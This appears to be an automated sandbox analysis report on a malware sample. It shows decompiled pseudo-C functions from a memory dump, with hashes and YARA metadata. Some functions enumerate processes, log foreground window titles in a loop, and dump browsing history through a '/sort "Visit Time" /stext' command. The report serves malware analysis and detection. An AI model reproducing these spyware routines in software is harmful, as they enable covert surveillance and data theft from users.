                              0x004426f7
                              0x004426fa
                              0x004426fc
                              0x004426ff
                              0x00000000
                              0x004426e4
                              0x004426e4
                              0x004426ea
                              0x004426ea
                              0x004426ee
                              0x00442701
                              0x00442701
                              0x00442705
                              0x00442706
                              0x00442708
                              0x0044270a
                              0x0044274b
                              0x0044274b
                              0x0044274d
                              0x0044275a
                              0x0044275a
                              0x0044275c
                              0x0044275e
                              0x0044275f
                              0x00442760
                              0x00442767
                              0x0044276a
                              0x0044276c
                              0x0044276c
                              0x0044276d
                              0x0044276f
                              0x00442772
                              0x00442772
                              0x00442774
                              0x00442776
                              0x00000000
                              0x00442776
                              0x0044274f
                              0x00442751
                              0x00000000
                              0x00000000
                              0x00442753
                              0x00000000
                              0x00000000
                              0x00442755
                              0x00442758
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00442758
                              0x00442711
                              0x00442717
                              0x00442717
                              0x00442719
                              0x0044271a
                              0x0044271b
                              0x0044271c
                              0x00442723
                              0x00442726
                              0x00442728
                              0x00442729
                              0x0044272b
                              0x00442738
                              0x00442738
                              0x0044273a
                              0x0044273c
                              0x0044273d
                              0x0044273e
                              0x00442745
                              0x00442748
                              0x0044274a
                              0x0044274a
                              0x00000000
                              0x0044274a
                              0x0044272d
                              0x0044272d
                              0x0044272f
                              0x00000000
                              0x00000000
                              0x00442731
                              0x00000000
                              0x00000000
                              0x00442733
                              0x00442736
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00442736
                              0x00442713
                              0x00442715
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00442715
                              0x004426e6
                              0x004426e8
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004426e8
                              0x004426e2
                              0x00000000
                              0x004425cc
                              0x004425c7
                              0x004424ee
                              0x004424f0
                              0x00000000
                              0x004424f2
                              0x00442508
                              0x0044250d
                              0x0044250f
                              0x0044251b
                              0x00442521
                              0x00442522
                              0x00442524
                              0x00442526
                              0x00442531
                              0x00442531
                              0x00442534
                              0x00442536
                              0x00442536
                              0x00442539
                              0x00442511
                              0x00442511
                              0x00442511
                              0x00000000
                              0x0044250f
                              0x004424be
                              0x004424be
                              0x004424c5
                              0x004424c6
                              0x004424c8
                              0x0044277a
                              0x0044277e
                              0x00442783
                              0x00442783
                              0x00442792
                              0x00442792

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: __alldvrm$_strrchr
                              • String ID:
                              • API String ID: 1036877536-0
                              • Opcode ID: 23a1a2d90236b02b2083a87cd05f4a9d3c3254100ec0a3a0d8469f59a596ace0
                              • Instruction ID: 63a792aad3bfe3cbde7ecdf4ead5abea7afdf704ef8a669ef2216d63f232220a
                              • Opcode Fuzzy Hash: 23a1a2d90236b02b2083a87cd05f4a9d3c3254100ec0a3a0d8469f59a596ace0
                              • Instruction Fuzzy Hash: C0A158719003869FFB118F28C9917AEBBA4EF55310F5541AFF4859B382C6BC9D41C758
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0043B0B1, Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                              Download Yara Rule
                              C-Code - Quality: 95%
                              			E0043B0B1(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = E0043B1FE(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = E00450430(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x4591c8;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x459194;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = E00450430( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = E00450430(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = E00450430(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = L00439E14();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = L00439E14();
					_t102 = 0x16;
					 *_t69 = _t102;
					E0043626D();
					goto L11;
				}
				_t71 = L00439E14();
				_t103 = 0x16;
				 *_t71 = _t103;
				E0043626D();
				return _t103;
			}
































                              0x0043b0ba
                              0x0043b0bf
                              0x0043b0df
                              0x0043b0e0
                              0x0043b0e2
                              0x0043b0e5
                              0x0043b0e7
                              0x0043b0fa
                              0x0043b0fd
                              0x0043b0ff
                              0x0043b102
                              0x0043b105
                              0x0043b108
                              0x0043b113
                              0x0043b115
                              0x0043b116
                              0x0043b118
                              0x0043b134
                              0x0043b138
                              0x0043b141
                              0x0043b146
                              0x0043b14d
                              0x0043b15a
                              0x0043b15f
                              0x0043b169
                              0x0043b16e
                              0x0043b173
                              0x0043b175
                              0x0043b17c
                              0x0043b17e
                              0x0043b17e
                              0x0043b183
                              0x0043b188
                              0x0043b189
                              0x0043b18c
                              0x0043b194
                              0x0043b194
                              0x0043b195
                              0x0043b1a3
                              0x0043b1ab
                              0x0043b1b8
                              0x0043b1b9
                              0x0043b1c3
                              0x0043b1c9
                              0x0043b1d3
                              0x0043b1da
                              0x0043b1de
                              0x0043b1e2
                              0x0043b1e7
                              0x0043b1eb
                              0x0043b1f3
                              0x0043b1f3
                              0x0043b1f5
                              0x0043b1f8
                              0x00000000
                              0x0043b18e
                              0x0043b18e
                              0x0043b18e
                              0x0043b18f
                              0x0043b18f
                              0x00000000
                              0x0043b18e
                              0x0043b18c
                              0x0043b11a
                              0x0043b123
                              0x0043b123
                              0x0043b12a
                              0x0043b12b
                              0x0043b12d
                              0x0043b12d
                              0x00000000
                              0x0043b12d
                              0x0043b11c
                              0x0043b121
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043b121
                              0x0043b10a
                              0x00000000
                              0x00000000
                              0x0043b10c
                              0x0043b111
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043b111
                              0x0043b0e9
                              0x0043b0f0
                              0x0043b0f1
                              0x0043b0f3
                              0x00000000
                              0x0043b0f3
                              0x0043b0c1
                              0x0043b0c8
                              0x0043b0c9
                              0x0043b0cb
                              0x00000000

                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4ca7261ae704e926ef2e87033f740578fb49095d9bc2293d227a698108ee9142
                              • Instruction ID: fabbc6a6f7032cda4dd40e8c936e700ba33ba9abdb81f3509140ce19fd5ad8dd
                              • Opcode Fuzzy Hash: 4ca7261ae704e926ef2e87033f740578fb49095d9bc2293d227a698108ee9142
                              • Instruction Fuzzy Hash: 08410672A00304AFDB249F39CC51BAB7BA9EB8C714F10962FF211DB281D779994187C4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040D5B1, Relevance: 6.1, APIs: 4, Instructions: 127processCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040D5B1(void* __ebx, void* __ecx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				char _v220;
				char _v244;
				char _v268;
				char _v292;
				char _v316;
				char _v340;
				char _v864;
				intOrPtr _v892;
				void* _v900;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t129;
				void* _t130;

				_t77 = __ecx;
				_t76 = __ebx;
				_t129 = __ecx;
				E004020B5(__ebx, __ecx);
				 *0x46beb4 = L00416F6C(_t77);
				_t130 = CreateToolhelp32Snapshot(2, 0);
				if(_t130 != 0) {
					_v900 = 0x22c;
					Process32FirstW(_t130,  &_v900);
					while(Process32NextW(_t130,  &_v900) != 0) {
						E0040425F(_t76,  &_v28,  &_v864);
						_t47 = L00416B7E(_t76,  &_v340, L00416F9A(_v892) & 0x000000ff);
						_t48 = L00416B7E(_t76,  &_v316, _v892);
						_t50 = L00416CF4(_t76,  &_v268, L00416FD0( &_v292, _v892));
						L00401FB1(_t129, _t58, _t130, E0040530D(_t76,  &_v52, L00402EFD( &_v76, E0040530D(_t76,  &_v100, L00402EFD( &_v124, E0040530D(_t76,  &_v148, L00402EFD( &_v172, E0040530D(_t76,  &_v196, E004074F2(_t76,  &_v220, _t129, __eflags, L00416CF4(_t76,  &_v244,  &_v28)), _t129, __eflags, 0x460634), _t50), _t129, __eflags, 0x460634), _t48), _t129, __eflags, 0x460634), _t47), _t129, __eflags, "|"));
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401ED0();
						L00401FA7();
						L00401FA7();
						L00401ED0();
					}
					CloseHandle(_t130);
				}
				return _t129;
			}



























                              0x0040d5b1
                              0x0040d5b1
                              0x0040d5bc
                              0x0040d5be
                              0x0040d5cc
                              0x0040d5d7
                              0x0040d5db
                              0x0040d5e7
                              0x0040d5f3
                              0x0040d772
                              0x0040d608
                              0x0040d626
                              0x0040d63d
                              0x0040d661
                              0x0040d6e2
                              0x0040d6ea
                              0x0040d6f2
                              0x0040d6fa
                              0x0040d702
                              0x0040d70d
                              0x0040d718
                              0x0040d723
                              0x0040d72e
                              0x0040d739
                              0x0040d744
                              0x0040d74f
                              0x0040d75a
                              0x0040d765
                              0x0040d76d
                              0x0040d76d
                              0x0040d789
                              0x0040d789
                              0x0040d796

                              APIs
                                • Part of subcall function 00416F6C: GetCurrentProcess.KERNEL32(?,?,?,00417A29,WinDir,00000000,00000000), ref: 00416F7D
                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0040D5D1
                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040D5F3
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D77A
                              • CloseHandle.KERNEL32(00000000), ref: 0040D789
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                              • String ID:
                              • API String ID: 592884611-0
                              • Opcode ID: 716ab2d06d8a60fa4db77e097107724ca002d183ef2603b9f039fcd80d9d1449
                              • Instruction ID: d2b0c1bf7218dab9c36398846b3bef5936211f0d8f53bb00f93021c478d55916
                              • Opcode Fuzzy Hash: 716ab2d06d8a60fa4db77e097107724ca002d183ef2603b9f039fcd80d9d1449
                              • Instruction Fuzzy Hash: 00414071A002195AC719FB61DC51EEEB375AF50304F5041BFB409A71E2EF786E8ACE88
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00408A53, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 82sleepCOMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E00408A53() {
				char _v2004;
				char _v2012;
				char _v2028;
				void* _v2036;
				char _v2056;
				void* _v2060;
				char _v2080;
				void* _v2084;
				void* _t15;
				signed int _t17;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t59;
				void* _t61;
				signed int _t62;
				signed int _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t63 = _t62 & 0xfffffff8;
				_t69 = _t63;
				_t64 = _t63 - 0x81c;
				_push(_t34);
				_t59 = Sleep;
				_t61 = _t35;
				while(1) {
					E00431810(_t59,  &_v2004, 0, 0x7d0);
					_t65 = _t64 + 0xc;
					while(1) {
						_t15 = L00401F75(L00401E29(0x46c578, _t56, _t69, 0x2a));
						_t66 = _t65 - 0x18;
						E0040425F(_t34, _t66, _t15);
						_t17 = E00417417( &_v2012, _t56);
						_t65 = _t66 + 0x18;
						_t69 = _t17;
						if(_t17 != 0) {
							break;
						}
						Sleep(0x1f4);
					}
					_t56 = E004043E5(_t34,  &_v2056, L"\r\n[ ", __eflags, E0040425F(_t34,  &_v2028,  &_v2004));
					L00401EDA(_t61 + 4, _t20, _t61, E00403086(_t34,  &_v2080, _t20, _t59, __eflags, L" ]\r\n"));
					L00401ED0();
					L00401ED0();
					L00401ED0();
					_t67 = _t65 - 0x18;
					E00407352(_t34, _t67, _t56, __eflags, _t61 + 0x60);
					E00408744(_t61);
					while(1) {
						_t30 = L00401F75(L00401E29(0x46c578, _t56, __eflags, 0x2a));
						_t68 = _t67 - 0x18;
						E0040425F(_t34, _t68, _t30);
						_t32 = E00417417(0, _t56);
						_t64 = _t68 + 0x18;
						__eflags = _t32;
						if(__eflags == 0) {
							break;
						}
						Sleep(0x64);
					}
					E004095AB(_t34, _t61);
				}
			}


























                              0x00408a56
                              0x00408a56
                              0x00408a59
                              0x00408a5f
                              0x00408a62
                              0x00408a68
                              0x00408a6a
                              0x00408a76
                              0x00408a7b
                              0x00408a7e
                              0x00408a8c
                              0x00408a91
                              0x00408a97
                              0x00408aa0
                              0x00408aa5
                              0x00408aa8
                              0x00408aaa
                              0x00000000
                              0x00000000
                              0x00408ab1
                              0x00408ab1
                              0x00408ad8
                              0x00408ae8
                              0x00408af1
                              0x00408afa
                              0x00408b03
                              0x00408b08
                              0x00408b11
                              0x00408b18
                              0x00408b1d
                              0x00408b2b
                              0x00408b30
                              0x00408b36
                              0x00408b3d
                              0x00408b42
                              0x00408b45
                              0x00408b47
                              0x00000000
                              0x00000000
                              0x00408b4b
                              0x00408b4b
                              0x00408b51
                              0x00408b51

                              APIs
                                • Part of subcall function 00417417: GetForegroundWindow.USER32(73B76490,?), ref: 00417427
                                • Part of subcall function 00417417: GetWindowTextLengthW.USER32(00000000), ref: 00417430
                                • Part of subcall function 00417417: GetWindowTextW.USER32 ref: 0041745A
                              • Sleep.KERNEL32(000001F4), ref: 00408AB1
                              • Sleep.KERNEL32(00000064), ref: 00408B4B
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Window$SleepText$ForegroundLength
                              • String ID: [ $ ]
                              • API String ID: 3309952895-93608704
                              • Opcode ID: a1bf6640d8231aa274d9fe40541848d5a6ba70444c51f545770990fb7b3e391b
                              • Instruction ID: cca0d05e2164998ef68a958f21fdddd47f0264d2a0f8426d28c401fd19228762
                              • Opcode Fuzzy Hash: a1bf6640d8231aa274d9fe40541848d5a6ba70444c51f545770990fb7b3e391b
                              • Instruction Fuzzy Hash: 5721CFB1A0420067C604F676DD17A6E72699F80748F40043FF982772E3EE3DAA09869F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00417334, Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 83%
                              			E00417334(WCHAR* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				struct _OVERLAPPED* _t13;
				struct _OVERLAPPED* _t15;
				void* _t22;
				long _t25;

				_push(__ecx);
				_push(__ecx);
				_t15 = 0;
				_v8 = __edx;
				_t22 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t25 = GetFileSize(_t22, 0);
					E00402439(0, _v8, _t22, _t25, 0);
					_v12 = 0;
					if(ReadFile(_t22, L00401F75(_v8), _t25,  &_v12, 0) != 0) {
						_t15 = 1;
					}
					CloseHandle(_t22);
					_t13 = _t15;
				} else {
					_t13 = 0;
				}
				return _t13;
			}











                              0x00417337
                              0x00417338
                              0x0041733b
                              0x0041733d
                              0x00417357
                              0x0041735c
                              0x0041736e
                              0x00417372
                              0x00417380
                              0x00417393
                              0x00417395
                              0x00417395
                              0x00417398
                              0x0041739e
                              0x0041735e
                              0x0041735e
                              0x0041735e
                              0x004173a5

                              APIs
                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417351
                              • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417365
                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 0041738A
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00404210,0045F454), ref: 00417398
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleReadSize
                              • String ID:
                              • API String ID: 3919263394-0
                              • Opcode ID: 3ffb256bfb62a0ac902b2c1c797c7c06f6ce1e0d8605f8ffe047bc3b227f72d2
                              • Instruction ID: 56c905e826b57cd088f8bccfe3f058dde1bc79989e28d4bbb664d7596ff6dfd6
                              • Opcode Fuzzy Hash: 3ffb256bfb62a0ac902b2c1c797c7c06f6ce1e0d8605f8ffe047bc3b227f72d2
                              • Instruction Fuzzy Hash: 8C01D671501218BFE7105F61AC89EFF777CEB45799F10016AFC04A3281D6749E019634
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00431611, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00431611() {
				void* _t4;
				void* _t8;

				E00434851();
				E004315A5();
				if(L00434AA5() != 0) {
					_t4 = E00434A57(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						L00434AE1();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                              0x00431611
                              0x00431616
                              0x00431622
                              0x00431627
                              0x0043162c
                              0x0043162e
                              0x00431639
                              0x00431630
                              0x00431630
                              0x00000000
                              0x00431630
                              0x00431624
                              0x00431624
                              0x00431626
                              0x00431626

                              APIs
                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00431611
                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00431616
                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0043161B
                                • Part of subcall function 00434AA5: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00434AB6
                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00431630
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                              • String ID:
                              • API String ID: 1761009282-0
                              • Opcode ID: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
                              • Instruction ID: 5bd34e3a9dce145a3b421456380c81e9cc1b8235ab00a0158aa2437511a3e12d
                              • Opcode Fuzzy Hash: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
                              • Instruction Fuzzy Hash: 59C04C58484180162C543AF222035EE13602CFF39DF9534CFA8A117523890E640B683F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040412D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                              Download Yara Rule
                              C-Code - Quality: 90%
                              			E0040412D(void* __ebx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __edi;
				WCHAR* _t40;
				struct HINSTANCE__* _t81;
				struct HINSTANCE__* _t84;
				void* _t85;

				_t48 = __ebx;
				_t81 = 0;
				GetModuleFileNameW(0,  &_v692, 0x104);
				E004020B5(__ebx,  &_v52);
				E00417967( &_v28, 0x30, L00401F75(E004169EB( &_v76)));
				L00401FA7();
				L00401F75(0x46c1a0);
				L00413CCA(L00401ECB(E00403086(_t48,  &_v100, E00404409(_t48,  &_v124, E004043E5(_t48,  &_v148,  &_v692, 0, E0040425F(__ebx,  &_v172, L" /sort \"Visit Time\" /stext \"")), 0,  &_v28), 0, 0, "\"")));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				_t84 = 0;
				while(1) {
					_t40 = L00401ECB( &_v28);
					_t80 =  &_v52;
					if(E00417334(_t40,  &_v52) != 0) {
						break;
					}
					Sleep(0xfa);
					_t84 =  &(_t84->i);
					if(_t84 < 0x14) {
						continue;
					} else {
					}
					L5:
					L00401ED0();
					L00401FA7();
					return _t81;
				}
				E004020CC(_t48, _t85 - 0x18,  &_v52, __eflags,  &_v52);
				_push(0x9d);
				L00404A6E(_t48, 0x46c138, _t80, __eflags);
				_t81 = 1;
				__eflags = 1;
				goto L5;
			}
















                              0x0040412d
                              0x00404144
                              0x00404147
                              0x00404150
                              0x0040416a
                              0x00404173
                              0x0040417d
                              0x004041d1
                              0x004041d9
                              0x004041e1
                              0x004041ec
                              0x004041f7
                              0x004041fc
                              0x004041fe
                              0x00404201
                              0x00404206
                              0x00404212
                              0x00000000
                              0x00000000
                              0x00404219
                              0x0040421f
                              0x00404223
                              0x00000000
                              0x00000000
                              0x00404225
                              0x00404247
                              0x0040424a
                              0x00404252
                              0x0040425e
                              0x0040425e
                              0x00404230
                              0x00404235
                              0x0040423f
                              0x00404246
                              0x00404246
                              0x00000000

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404147
                                • Part of subcall function 004169EB: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040415D), ref: 00416A12
                                • Part of subcall function 00413CCA: CloseHandle.KERNEL32(004041D6,?,004041D6,0045F454), ref: 00413CE0
                                • Part of subcall function 00413CCA: CloseHandle.KERNEL32(0045F454,?,004041D6,0045F454), ref: 00413CE9
                                • Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417351
                              • Sleep.KERNEL32(000000FA,0045F454), ref: 00404219
                              Strings
                              • /sort "Visit Time" /stext ", xrefs: 00404193
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                              • String ID: /sort "Visit Time" /stext "
                              • API String ID: 368326130-1573945896
                              • Opcode ID: 4035527b6a06ba8322556ec4bf730b267a5f89deb7f1e16ed7a21f7ae8ceee55
                              • Instruction ID: 077a0f2c23c77d26b68de5e3cb7190eb75c300570ed309256026d755c7120731
                              • Opcode Fuzzy Hash: 4035527b6a06ba8322556ec4bf730b267a5f89deb7f1e16ed7a21f7ae8ceee55
                              • Instruction Fuzzy Hash: 5A318471A1021857CB14FBB6DC969EE7775AF90309F00007FB506B71E2EF381A4ACA99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00448967, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E00448967(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				void* __esi;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t36;

				_push(__ecx);
				_t23 = _a4;
				_push(_t34);
				if(_t23 == 0) {
					L21:
					_t15 = E00441069(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t34 = 0x459f98;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t34) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t36 = 0x459fa0;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t36) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t48 = _t17;
								if(_t17 != 0) {
									_t16 = E0043604F(_t23, _t23);
									goto L25;
								}
								if(E00441069(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t36 = _t36 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t34 = _t34 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}


















                              0x0044896c
                              0x0044896d
                              0x00448970
                              0x00448974
                              0x00448a1a
                              0x00448a2e
                              0x00448a33
                              0x00448a35
                              0x00448a3b
                              0x00448a3e
                              0x00448a40
                              0x00448a42
                              0x00448a42
                              0x00448a48
                              0x00448a4d
                              0x00448a4d
                              0x00448a37
                              0x00448a37
                              0x00000000
                              0x00448a37
                              0x0044897a
                              0x0044897f
                              0x00000000
                              0x00000000
                              0x00448985
                              0x0044898a
                              0x0044898c
                              0x0044898c
                              0x00448992
                              0x00000000
                              0x00000000
                              0x00448997
                              0x004489ae
                              0x004489ae
                              0x004489b7
                              0x004489b9
                              0x00000000
                              0x00000000
                              0x004489bb
                              0x004489c0
                              0x004489c2
                              0x004489c2
                              0x004489c8
                              0x00000000
                              0x00000000
                              0x004489cd
                              0x004489eb
                              0x004489eb
                              0x004489ed
                              0x00448a12
                              0x00000000
                              0x00448a17
                              0x00448a0a
                              0x00000000
                              0x00000000
                              0x00448a0c
                              0x00000000
                              0x00448a0c
                              0x004489cf
                              0x004489d7
                              0x00000000
                              0x00000000
                              0x004489d9
                              0x004489dc
                              0x004489e2
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004489e4
                              0x004489e6
                              0x004489e8
                              0x004489e8
                              0x00000000
                              0x004489e8
                              0x00448999
                              0x004489a1
                              0x00000000
                              0x00000000
                              0x004489a3
                              0x004489a6
                              0x004489ac
                              0x00000000
                              0x00000000
                              0x00000000
